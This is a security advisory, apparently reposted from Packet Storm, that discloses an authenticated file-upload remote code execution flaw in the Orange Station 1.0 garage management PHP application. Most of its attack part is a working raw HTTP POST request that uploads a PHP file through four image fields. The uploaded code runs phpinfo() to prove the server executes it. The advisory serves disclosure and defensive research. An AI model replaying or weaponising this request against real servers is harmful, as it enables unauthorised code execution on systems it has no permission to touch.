Orange Station 1.0 Shell Upload

🗓️ 26 Mar 2024 00:00:00Reported by nu11secur1tyType
packetstorm🔗 packetstormsecurity.com👁 295 Views
ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability in manage_website.php application. Attacker with credentials can upload PHP file, execute remote code, and steal sensitive information
`## Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability  
## Author: nu11secur1ty  
## Date: 03/26/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload,  
https://www.bugcrowd.com/glossary/remote-code-execution-rce/  
  
## Description:  
The parameters back_login_image, login_image, invoice_image, and  
website_image in the manage_website.php application are vulnerable for  
File Upload and the server is vulnerable for Remote code execution  
after this.  
The attacker who has credentials to this system can upload any PHP  
file and he can destroy the system or he can steal a very  
sensitive information.  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
## Exploit:  
```POST  
POST /garage/garage/manage_website.php HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n  
Content-Length: 1871  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://pwnedhost.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://pwnedhost.com/garage/garage/manage_website.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=0, i  
Connection: close  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="title"  
  
Orange Station  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="footer"  
  
Admin PanelÃ‚Â  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="short_title"  
  
9090909090  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="currency_code"  
  
Shivaji Nagar, Nashik  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="currency_symbol"  
  
Ã¢â€šÂ¹  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_website_image"  
  
logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="website_image"; filename="info.php"  
Content-Type: application/octet-stream  
  
<?php  
phpinfo();  
?>  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_invoice_image"  
  
logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="invoice_image"; filename="info.php"  
Content-Type: application/octet-stream  
  
<?php  
phpinfo();  
?>  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_login_image"  
  
logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="login_image"; filename="info.php"  
Content-Type: application/octet-stream  
  
<?php  
phpinfo();  
?>  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_back_login_image"  
  
service.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="back_login_image"; filename="info.php"  
Content-Type: application/octet-stream  
  
<?php  
phpinfo();  
?>  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="btn_web"  
  
  
------WebKitFormBoundaryytBZTydZ8OfOJjda--  
```  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/orange-station-10-multiple-file-upload.html)  
  
## Time spent:  
00:27:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`
26 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4